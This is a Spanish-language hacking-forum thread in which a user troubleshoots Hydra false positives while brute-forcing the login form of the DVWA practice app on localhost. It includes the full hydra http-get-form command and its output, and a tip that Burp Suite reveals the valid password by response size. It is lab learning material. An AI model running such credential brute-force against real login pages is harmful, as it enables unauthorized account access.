elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  [Solucionado]Pregunta sobre hydra!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Solucionado]Pregunta sobre hydra!  (Leído 3,742 veces)
jesusarturoes

Desconectado Desconectado

Mensajes: 194


Tu aprenderas a todo lo que le demuestres interes


Ver Perfil WWW
[Solucionado]Pregunta sobre hydra!
« en: 13 Agosto 2012, 09:35 am »

hydra como saben todos es un cracker por wordlist de muchos protocolos en este caso estoy utilizando un protocolo http-get-form

lo que pasa es lo siguiente hago una sintaxis asi:

Código:
hydra -vV -L lista.txt -P lista.txt -f -o found  127.0.0.1 http-get-form "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect"

con esto me devolveria en modo detallado el user y pass que se encuentran en wordlist lista.txt me dara la salida del archivo found el host es 127.0.0.1 http-get-form (el modulo) "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect" <<<--- esta es una regla que puedes ir creando segun la explicacion de hydra en.... hydra -U http-get-form

le puse username , password  y login ... ya que son los que vienen en el formulario real de la web en este caso es una aplicacion vulnerable dvwa

entonces me un restultado asi...

Código:
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-13 02:30:54
[DATA] 16 tasks, 1 server, 49 login tries (l:7/p:7), ~3 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 49 [child 0]
[80][www-form] host: 127.0.0.1   login: admin   password: user
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "user" - 2 of 49 [child 1]
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[80][www-form] host: 127.0.0.1   login: admin   password: xd
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd" - 3 of 49 [child 2]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 4 of 49 [child 3]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "chulo" - 5 of 49 [child 4]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "preciosa" - 6 of 49 [child 5]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd5" - 7 of 49 [child 6]
[80][www-form] host: 127.0.0.1   login: admin   password: password
[ATTEMPT] target 127.0.0.1 - login "user" - pass "admin" - 8 of 49 [child 7]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "user" - 9 of 49 [child 8]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd" - 10 of 49 [child 9]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - 11 of 49 [child 10]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "chulo" - 12 of 49 [child 11]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "preciosa" - 13 of 49 [child 12]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd5" - 14 of 49 [child 13]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "admin" - 15 of 49 [child 14]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "user" - 16 of 49 [child 15]
[80][www-form] host: 127.0.0.1   login: admin   password: preciosa
[80][www-form] host: 127.0.0.1   login: admin   password: xd5
[80][www-form] host: 127.0.0.1   login: user   password: xd
[80][www-form] host: 127.0.0.1   login: user   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: user
[80][www-form] host: 127.0.0.1   login: user   password: chulo
[80][www-form] host: 127.0.0.1   login: user   password: password
[80][www-form] host: 127.0.0.1   login: xd   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: preciosa
[80][www-form] host: 127.0.0.1   login: user   password: xd5
[80][www-form] host: 127.0.0.1   login: xd   password: user
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-13 02:30:54

es decir yo se que el user es : admin  y la pass es : password

pero quiero saber por que si dice: 1 of 1 target successfuly completed, 1 valid password found
por que no me muestra solo el que es y no todos....

intente quitandole el modo detallado -vV o -v y nada sigue pasando lo mismo

alguien me podria decir que pasa que puedo hacer?  para que solo salga la password y usuario correctos y no todas la de la lista :P


« Última modificación: 13 Agosto 2012, 22:35 pm por jesusarturoes » En línea

Código:
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
jesusarturoes

Desconectado Desconectado

Mensajes: 194


Tu aprenderas a todo lo que le demuestres interes


Ver Perfil WWW
Re: Pregunta sobre hydra!
« Respuesta #1 en: 13 Agosto 2012, 22:35 pm »

Je! bueno me canse de usar hydra y no dar con la respuesta y me puse a usar burp suite con la que me dio la respuesta  :D
miren:



Ahi te das cuenta cual es la pass por que tiene un peso diferente y si te vas a la respuesta ahi me dice que me he logeado :D yeah! bueno ya lo pondre como solucionado xD


En línea

Código:
Nunca consideres el estudio como una obligación, sino como una oportunidad para penetrar en el bello y maravilloso mundo del saber.
Jenag


Desconectado Desconectado

Mensajes: 968


Conoce a tu enemigo como a tí mismo..


Ver Perfil
Re: [Solucionado]Pregunta sobre hydra!
« Respuesta #2 en: 13 Agosto 2012, 23:00 pm »

hydra como saben todos es un cracker por wordlist de muchos protocolos en este caso estoy utilizando un protocolo http-get-form

lo que pasa es lo siguiente hago una sintaxis asi:

Código:
hydra -vV -L lista.txt -P lista.txt -f -o found  127.0.0.1 http-get-form "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect"

con esto me devolveria en modo detallado el user y pass que se encuentran en wordlist lista.txt me dara la salida del archivo found el host es 127.0.0.1 http-get-form (el modulo) "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect" <<<--- esta es una regla que puedes ir creando segun la explicacion de hydra en.... hydra -U http-get-form

le puse username , password  y login ... ya que son los que vienen en el formulario real de la web en este caso es una aplicacion vulnerable dvwa

entonces me un restultado asi...

Código:
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-13 02:30:54
[DATA] 16 tasks, 1 server, 49 login tries (l:7/p:7), ~3 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 49 [child 0]
[80][www-form] host: 127.0.0.1   login: admin   password: user
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "user" - 2 of 49 [child 1]
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[80][www-form] host: 127.0.0.1   login: admin   password: xd
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd" - 3 of 49 [child 2]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 4 of 49 [child 3]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "chulo" - 5 of 49 [child 4]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "preciosa" - 6 of 49 [child 5]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd5" - 7 of 49 [child 6]
[80][www-form] host: 127.0.0.1   login: admin   password: password
[ATTEMPT] target 127.0.0.1 - login "user" - pass "admin" - 8 of 49 [child 7]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "user" - 9 of 49 [child 8]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd" - 10 of 49 [child 9]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - 11 of 49 [child 10]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "chulo" - 12 of 49 [child 11]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "preciosa" - 13 of 49 [child 12]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd5" - 14 of 49 [child 13]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "admin" - 15 of 49 [child 14]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "user" - 16 of 49 [child 15]
[80][www-form] host: 127.0.0.1   login: admin   password: preciosa
[80][www-form] host: 127.0.0.1   login: admin   password: xd5
[80][www-form] host: 127.0.0.1   login: user   password: xd
[80][www-form] host: 127.0.0.1   login: user   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: user
[80][www-form] host: 127.0.0.1   login: user   password: chulo
[80][www-form] host: 127.0.0.1   login: user   password: password
[80][www-form] host: 127.0.0.1   login: xd   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: preciosa
[80][www-form] host: 127.0.0.1   login: user   password: xd5
[80][www-form] host: 127.0.0.1   login: xd   password: user
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-13 02:30:54

es decir yo se que el user es : admin  y la pass es : password

pero quiero saber por que si dice: 1 of 1 target successfuly completed, 1 valid password found
por que no me muestra solo el que es y no todos....

intente quitandole el modo detallado -vV o -v y nada sigue pasando lo mismo

alguien me podria decir que pasa que puedo hacer?  para que solo salga la password y usuario correctos y no todas la de la lista :P
A mí me pasaba un caso similar cómo a tí , con hydra y estos subcomandos y xhydra también.
Pd : ¿No sigues investigando el por qué con hydra?. :-*
En línea

Para comentarme algo : Evamr1991@openmailbox.org : Válido para Bots y Robots..
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
pregunta sobre Host(solucionado)
Dudas Generales
Senior++ 2 6,670 Último mensaje 6 Septiembre 2011, 17:05 pm
por Senior++
Me falla la opción -t y dudo sobre la -f en Hydra [solucionado]
Hacking
alpha015 1 2,277 Último mensaje 2 Octubre 2011, 13:02 pm
por alpha015
[Solucionado] pregunta sobre end if
Programación Visual Basic
CAR3S? 8 3,734 Último mensaje 21 Octubre 2011, 19:06 pm
por CAR3S?
[SOLUCIONADO] Una pregunta sobre los recursos embedidos
.NET (C#, VB.NET, ASP)
Eleкtro 5 2,782 Último mensaje 31 Enero 2013, 09:21 am
por _katze_
[solucionado] Pregunta sobre numero en c++
Programación C/C++
elkiy 1 2,192 Último mensaje 28 Mayo 2013, 21:18 pm
por elkiy
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines